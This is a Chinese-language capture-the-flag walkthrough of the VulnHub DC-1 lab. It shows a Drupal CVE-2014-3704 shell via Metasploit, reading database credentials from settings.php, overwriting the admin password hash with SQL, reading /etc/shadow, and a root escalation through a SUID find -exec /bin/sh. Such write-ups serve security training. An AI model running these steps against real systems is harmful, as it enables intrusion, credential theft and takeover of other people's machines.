vulnhub-DC:1 - Flag夺取记

2020-05-21 17:58:24 admin 40

下载地址https://download.vulnhub.com/dc/DC-1.zip

nmap -A -T4 10.10.10.132 --script=vuln

通过返回结果看到存在CVE2014-3704
seachsploit搜索 -m参数可以把exp保存到当前位置
80765-nfd3vvitj.png

接着在msf上搜
68620-hec19sgupvi.png
07145-nfhrv9x1bh.png

漏洞利用getshell
16812-co6lbypat4.png

切换shellcat flag1.txtEvery good CMS needs a config file - and so do you.

发现flag1
寻找drupal配置文件
drupal数据库配置文件默认在
/sites/default/settings.php
发现flag2

cat settings.php<?php/** * * flag2 * Brute force and dictionary attacks aren't the * only ways to gain access (and you WILL need access). * What can you do with these credentials? * */$databases = array ('default' =>array ('default' =>array ('database' => 'drupaldb','username' => 'dbuser','password' => 'R0ck3t','host' => 'localhost','port' => '','driver' => 'mysql','prefix' => '',),),);

使用python获取交互shell查看当前权限

python -c '__import__("pty").spawn("/bin/bash")'
05016-o8c43o8qkc.png

可以看到是www权限
14308-2g8g0sv31ue.png

通过查看数据库

发现密码hash加盐,破解难度比较大,可以通过更新密码,或者利用其他方法
利用
74284-czkfq74svdv.png

update users set pass=‘$S$CDbdwZvjHQ09IVRs88G0fnaxPr50/kb81YI9.8M/D9okW7J/s5U4’ where name=‘admin';

`
update users set pass='$S$CDbdwZvjHQ09IVRs88G0fnaxPr50/kb81YI9.8M/D9okW7J/s5U4' where name='admin';`
然后用password登陆

之前通过seachsploit发现有个可以添加一个管理权限的脚本
26258-nslmlgnnxrc.png

把此脚本复制到当前目录下
48102-yqg0nl64ug.png
也可以登录到管理员
83629-p76hm3mxq5c.png
可直接添加有admin权限的账户
拿到第3个flag
17059-tmo7lz7ldne.png

查看提示

whoamiuname -acat /etc/passwdcat /etc/shadow

91148-419w8dx4tdm.png
发现flag4在home目录下
58792-ee9vduj6ope.png
他让你使用root访问
接下来提权
通过flag3获取到提示的使用find -exec
搜索suid权限的程序

find / -user root -perm -4000 -print 2>/dev/nullfind / -type f -perm -u=s 2>/dev/null

发现使用find有root权限
然后用find … - exec “…” 查找文件后并执行命令

find ./ -exec "whoami" \;find ./ -exec "/bin/sh" \;

成功提到root权限
26406-er4u5jui1mg.png

成功拿到第五个flag
99661-4so0keb35hc.png


电话咨询
在线留言
QQ客服